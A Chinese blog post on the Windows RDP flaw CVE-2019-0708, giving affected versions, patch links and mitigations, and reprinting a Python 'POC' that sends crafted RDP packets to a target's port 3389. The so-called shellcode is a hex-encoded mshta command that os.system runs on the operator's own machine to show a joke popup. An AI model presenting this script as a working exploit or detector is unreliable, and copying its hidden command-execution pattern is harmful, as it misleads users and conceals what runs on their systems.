我的朋友圈被刷屏了(CVE-2019-0708)

1 个月前 文章归档 20

我的朋友圈被刷屏了

(CVE-2019-0708)

时时跟进互联网所发生的新闻新鲜事,昨天朋友圈被一个打篮球的人给刷屏了,他说他同时会唱、跳、RAP、篮球为什么只留下了一个篮球?就连国外的老黑们好像都知道了CXK,不知道他们百度一下CXK会是什么样的表情。

还有我朋友们说我打篮球的样子像极了CXK!是不是在夸我啊?我好快落。

当你检测服务器时会提示:

you play basketball like caixukun

我并不知道是什么意思,那位大佬好心告诉我一下。

回归正题

CVE-2019-0708远程桌面服务远程代码执行漏洞

 

一、漏洞信息:

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708(https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708),此漏洞是预身份验证且无需用户交互(无需验证系统账户密码),这就意味着这个漏洞可以通过网络蠕虫的方式被利用。

二、影响范围:

该漏洞影响了某些旧版本的Windows系统,如下:

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

三、需要注意的是:

对于Windows 7及Windows Server 2008的用户,及时安装Windows发布的安全更新。可以在Microsoft安全更新指南中找到支持Windows版本的安全更新进行下载。

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

(一)升级到最新版本

对于Windows 2003及Windows XP的用户,请及时更新到最新系统版本。微软在KB4500705中为这些不支持的Windows版本提供了修复程序。

对于Windows 2003及Windows XP的用户,及时更新系统版本。

(二)临时危害减轻措施:

开启网络身份验证(NLA)

2003补丁下载地址:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

2008R2补丁下载地址:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

更新后记得及时保存业务并重启服务器,使补丁生效(2008R2补丁编号kb4499175)。

Windows 8和Windows 10及之后版本的用户不受此漏洞影响。

受到影响的系统用户请讯速打系统漏洞补丁,据传闻讲系统早就存在漏洞了只不过现在才报出来。

error 404

error 404

error 404

error 404

 

error 404

利用工具:

我也不知道这个Github是什么,我也不敢问~~~

https://github.com/k8gege/CVE-2019-0708/blob/master/CVE-2019-0708-POC.py

 

这是K8GEGE开发的工具,当你检测服务器IP成功的时候,此时响起音乐J你太美。。。。。

#RDP Blue POC by k8gege    

#Local:  Win7  (python)    

#Target: Win2003 & Win2008 (open 3389)    

import socket    

import sys    

import os    

import platform    

buf=""    

buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19    

buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224    

buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470    

buf+="\x02\xf0\x80" # ITU-T Rec X.224    

buf+="\x7f\x65\x82\x01\x94\x04" #SERVICE T.125    

buf+="\x01\x01\x04\x01\x01\x01\x01\xff"     

buf+="\x30\x19\x02\x04\x00\x00\x00\x00"    

buf+="\x02\x04\x00\x00\x00\x02\x02\x04"    

buf+="\x00\x00\x00\x00\x02\x04\x00\x00"#COMMUNICATION    

buf+="\x00\x01\x02\x04\x00\x00\x00\x00"    

buf+="\x02\x04\x00\x00\x00\x01\x02\x02"    

buf+="\xff\xff\x02\x04\x00\x00\x00\x02"    

buf+="\x30\x19\x02\x04\x00\x00\x00\x01"# TPKT, Version 5, Lenght 12    

buf+="\x02\x04\x00\x00\x00\x01\x02\x04"    

buf+="\x00\x00\x00\x01\x02\x04\x00\x00"    

buf+="\x00\x01\x02\x04\x00\x00\x00\x00"    

buf+="\x02\x04\x00\x00\x00\x01\x02\x02"    

buf+="\x04\x20\x02\x04\x00\x00\x00\x02"#MULTIPOINT    

buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"    

buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"    

buf+="\x00\x00\x00\x01\x02\x04\x00\x00"    

buf+="\x00\x00\x02\x04\x00\x00\x00\x01"    

buf+="\x02\x02\xff\xff\x02\x04\x00\x00"    

buf+="\x00\x02\x04\x82\x01\x33\x00\x05"    

buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"#message    

buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"    

buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"    

buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"    

buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"    

buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"# TPKT, Version 3, Lenght 12    

buf+="\x00\x53\x00\x54\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x04\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"# TPKT, Version 8, Lenght 12    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#nop    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x01\xca\x01\x00\x00\x00\x00"    

buf+="\x00\x10\x00\x07\x00\x01\x00\x30"    

buf+="\x00\x30\x00\x30\x00\x30\x00\x30"    

buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"#ITU-T Rec X.224    

buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"    

buf+="\x00\x30\x00\x30\x00\x30\x00\x30"    

buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"    

buf+="\x00\x30\x00\x30\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224    

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"    

buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"    

buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"    

buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"#ITU-T Rec X.224    

buf+="\x00\x03\x00\x00\x00\x72\x64\x70"    

buf+="\x64\x72\x00\x00\x00\x00\x00\x80"    

buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"    

buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"    

buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"    

buf+="\xc0"    

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12    

buf+="\x02\xf0\x80"  # ITU-T Rec X.224    

buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125    

buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8    

buf+="\x02\xf0\x80" # ITU-T Rec X.224    

buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125    

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12    

buf+="\x02\xf0\x80" # ITU-T Rec X.224    

buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125    

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12    

buf+="\x02\xf0\x80" #ITU-T Rec X.224    

buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125    

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12    

buf+="\x02\xf0\x80" #ITU-T Rec X.224    

buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125    

buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12    

buf+="\x02\xf0\x80" #ITU-T Rec X.224    

buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125    

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12    

buf+="\x02\xf0\x80" #ITU-T Rec X.224    

buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125    

buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12    

buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224    

buf2="\x23\x79\x6F\x75\x20\x70\x6C\x61\x79\x20"    

buf2+="\x62\x61\x73\x6B\x65\x74\x62\x61\x6C\x6C"    

buf2+="\x20\x6C\x69\x6B\x65\x20\x63\x61\x69\x78"    

buf2+="\x75\x6B\x75\x6E\x23";    

sc="\x6D\x73\x68\x74\x61\x20\x76\x62\x73\x63" #shellcode    

sc+="\x72\x69\x70\x74\x3A\x6D\x73\x67\x62\x6F"    

sc+="\x78\x28\x22\x79\x6F\x75\x20\x70\x6C\x61"    

sc+="\x79\x20\x62\x61\x73\x6B\x65\x74\x62\x61"    

sc+="\x6C\x6C\x20\x6C\x69\x6B\x65\x20\x63\x61"    

sc+="\x69\x78\x75\x6B\x75\x6E\x21\x22\x2C\x36"    

sc+="\x34\x2C\x22\x4B\x38\x67\x65\x67\x65\x3A"    

sc+="\x22\x29\x28\x77\x69\x6E\x64\x6F\x77\x2E"    

sc+="\x63\x6C\x6F\x73\x65\x29";    

HOST = sys.argv[1]    

PORT = 3389    

print "Win2003 & Win2008 RDP POC"    

print "Target: "+HOST    

recexec=buf    

for i in range(8):    

try:    

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    

s.connect((HOST,PORT))    

print "sending: %d bytes" % len(buf)    

s.send(buf)    

rec = s.recv(100)    

recexec=sc    

print "received: %d bytes" % len(rec)    

s.close()    

print ""    

except:    

if(platform.system()=="Windows"):    

os.system(recexec)    

 

 

“IT同路人”微信公众号

投稿邮箱:[email protected]

工欲善其事,必先利其器。

推荐阅读:

收藏